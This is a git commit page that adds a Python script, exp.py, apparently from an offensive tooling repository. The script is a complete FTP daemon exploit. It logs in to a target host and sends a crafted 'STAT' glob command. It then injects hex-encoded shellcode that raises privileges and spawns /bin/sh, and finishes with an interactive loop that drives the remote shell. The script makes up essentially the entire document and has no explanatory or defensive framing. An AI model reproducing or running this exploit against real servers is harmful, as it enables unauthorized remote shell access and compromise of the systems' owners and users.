diff options
| author | Root THC | 2026-02-24 12:42:47 +0000 |
|---|---|---|
| committer | Root THC | 2026-02-24 12:42:47 +0000 |
| commit | c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch) | |
| tree | aefc355416b561111819de159ccbd86c3004cf88 /exploits/ftpd_exp/exp.py | |
| parent | 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff) | |
initial
Diffstat (limited to 'exploits/ftpd_exp/exp.py')
| -rw-r--r-- | exploits/ftpd_exp/exp.py | 26 |
1 files changed, 26 insertions, 0 deletions
diff --git a/exploits/ftpd_exp/exp.py b/exploits/ftpd_exp/exp.py new file mode 100644 index 0000000..86ec3cc --- /dev/null +++ b/exploits/ftpd_exp/exp.py | |||
| @@ -0,0 +1,26 @@ | |||
| 1 | #!/usr/bin/env python | ||
| 2 | from ftplib import * | ||
| 3 | import os,time,struct,sys | ||
| 4 | from select import select | ||
| 5 | |||
| 6 | shellcode = '\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xc0\x50\x50\x50\xb0\x7f\xcd\x80\xeb\x17\x31\xc0\x5b\x50\x88\x43\x07\x8d\x4b\x08\x89\x5b\x08\x89\x43\x0c\x51\x53\x50\xb0\x3b\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh\x0a' | ||
| 7 | |||
| 8 | ftp = FTP() | ||
| 9 | ftp.connect('192.168.1.2',21) | ||
| 10 | ftp.login('username','password') | ||
| 11 | |||
| 12 | time.sleep(6) | ||
| 13 | print 'sending stat command' | ||
| 14 | ftp.putcmd('STAT a*/*/*/*/') | ||
| 15 | print 'sending shellcode' | ||
| 16 | ftp.sock.send(shellcode) | ||
| 17 | time.sleep(2) | ||
| 18 | while 1: | ||
| 19 | heh = select([sys.stdin,ftp.sock],[],[]) | ||
| 20 | for i in heh[0]: | ||
| 21 | if i == sys.stdin: | ||
| 22 | buf = sys.stdin.readline() | ||
| 23 | ftp.sock.send(buf) | ||
| 24 | if i == ftp.sock: | ||
| 25 | buf = ftp.sock.recv(1024) | ||
| 26 | sys.stdout.write(buf) | ||